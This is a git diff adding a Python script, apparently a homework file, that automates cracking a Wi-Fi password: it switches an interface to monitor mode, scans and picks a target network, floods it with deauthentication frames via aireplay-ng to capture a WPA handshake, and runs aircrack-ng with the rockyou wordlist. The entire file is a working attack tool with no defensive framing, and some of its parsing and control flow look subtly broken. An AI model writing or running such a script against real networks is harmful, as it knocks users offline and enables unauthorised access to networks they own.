diff --git a/hw7/gemini/app.py b/hw7/gemini/app.py index e69de29..d084645 100644 --- a/hw7/gemini/app.py +++ b/hw7/gemini/app.py @@ -0,0 +1,79 @@ +import subprocess +import re +import time + +def change_to_monitor_mode(interface): + """Changes the given interface to monitor mode.""" + subprocess.run(["sudo", "airmon-ng", "start", interface]) + +def change_to_managed_mode(interface): + """Changes the given interface to managed mode.""" + subprocess.run(["sudo", "airmon-ng", "stop", interface]) + +def get_wifi_interfaces(): + """Returns a list of available wifi interfaces.""" + output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode() + interfaces = re.findall(r"(\w+)\s+IEEE", output) + return interfaces + +def get_target_network(interfaces): + """Prompts the user to choose a target network from a list of scanned networks.""" + print("Scanning for networks...") + process = subprocess.Popen(["sudo", "airodump-ng", "--band", "bg", "-w", "scan", interfaces[0]], stdout=subprocess.PIPE) + time.sleep(5) # Scan for a few seconds + process.terminate() + output = process.communicate()[0].decode() + networks = re.findall(r"(\s+)([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\s+(-[0-9]+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(-\w+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(.*)", output) + if networks: + print("Available networks:") + for i, network in enumerate(networks): + print(f"{i+1}. {network[-1]} (BSSID: {network[1]})") + choice = int(input("Choose target network: ")) - 1 + return networks[choice] + else: + print("No networks found.") + return None + +def capture_handshake(target_network, interface): + """Captures the handshake of the target network.""" + bssid = target_network[1] + channel = target_network[3] + subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", channel, "--write", "capture", interface], stdout=subprocess.DEVNULL) + print(f"Capturing handshake for {target_network[-1]} (BSSID: {bssid})...") + try: + while True: + subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface]) + time.sleep(5) + except KeyboardInterrupt: + print("Handshake capture stopped.") + +def crack_password(capture_file, wordlist): + """Cracks the password of the captured handshake using the given wordlist.""" + print("Cracking password...") + try: + output = subprocess.run(["sudo", "aircrack-ng", "-w", wordlist, capture_file], capture_output=True).stdout.decode() + password = re.search(r"KEY FOUND!\s+\[(.*)\]", output) + if password: + return password.group(1) + else: + return None + except FileNotFoundError: + print(f"Wordlist not found: {wordlist}") + return None + +if __name__ == "__main__": + interfaces = get_wifi_interfaces() + if interfaces: + interface = interfaces[0] # Use the first interface for now + change_to_monitor_mode(interface) + target_network = get_target_network(interfaces) + if target_network: + capture_handshake(target_network, interface) + password = crack_password("capture-01.cap", "~/rockyou.txt") + if password: + print(f"Password found: {password}") + else: + print("Password not found.") + change_to_managed_mode(interface) + else: + print("No wifi interfaces found.")